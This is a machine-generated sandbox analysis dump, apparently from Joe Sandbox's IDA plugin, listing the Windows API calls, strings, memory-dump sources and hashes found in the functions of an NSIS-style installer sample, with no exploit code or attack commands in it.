                                                    • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                    • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                    • DeleteObject.GDI32(00000000), ref: 00405007
                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                    • ShowWindow.USER32(?,00000005), ref: 00405169
                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                    • GlobalFree.KERNEL32(?), ref: 00405347
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
                                                    • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                    • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                    • ShowWindow.USER32(00000000), ref: 00405503
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $M$N
                                                    • API String ID: 2564846305-813528018
                                                    • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                    • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                    • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                    • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                    APIs
                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
                                                    • GetSysColor.USER32(?), ref: 0040473F
                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                    • lstrlenW.KERNEL32(?), ref: 00404760
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                    • SendMessageW.USER32(00000000), ref: 004047E2
                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                    • SetCursor.USER32(00000000), ref: 00404861
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                    • SetCursor.USER32(00000000), ref: 0040487D
                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                    • String ID: : Completed$N
                                                    • API String ID: 3103080414-2140067464
                                                    • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                    • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                    • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                    • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                    • wsprintfA.USER32 ref: 004061E6
                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                    • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                    • String ID: %ls=%ls$[Rename]
                                                    • API String ID: 2171350718-461813615
                                                    • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                    • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                    • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                    • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                    • GetSysColor.USER32(00000000), ref: 00404562
                                                    • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                    • SetBkMode.GDI32(?,?), ref: 0040457A
                                                    • GetSysColor.USER32(?), ref: 0040458D
                                                    • SetBkColor.GDI32(?,?), ref: 0040459D
                                                    • DeleteObject.GDI32(?), ref: 004045B7
                                                    • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                    • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                    • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                      • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                    • String ID: 9
                                                    • API String ID: 163830602-2366072709
                                                    • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                    • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                    • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                    • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                    APIs
                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                    • CharNextW.USER32(?,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                    • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                    • API String ID: 589700163-1439852002
                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                    • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                    • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                    • GetMessagePos.USER32 ref: 00404E7E
                                                    • ScreenToClient.USER32(?,?), ref: 00404E98
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                    • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                    • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                    • MulDiv.KERNEL32(00009E00,00000064,000AD530), ref: 00402FE1
                                                    • wsprintfW.USER32 ref: 00402FF1
                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                    Strings
                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: verifying installer: %d%%
                                                    • API String ID: 1451636040-82062127
                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                    • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                    • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
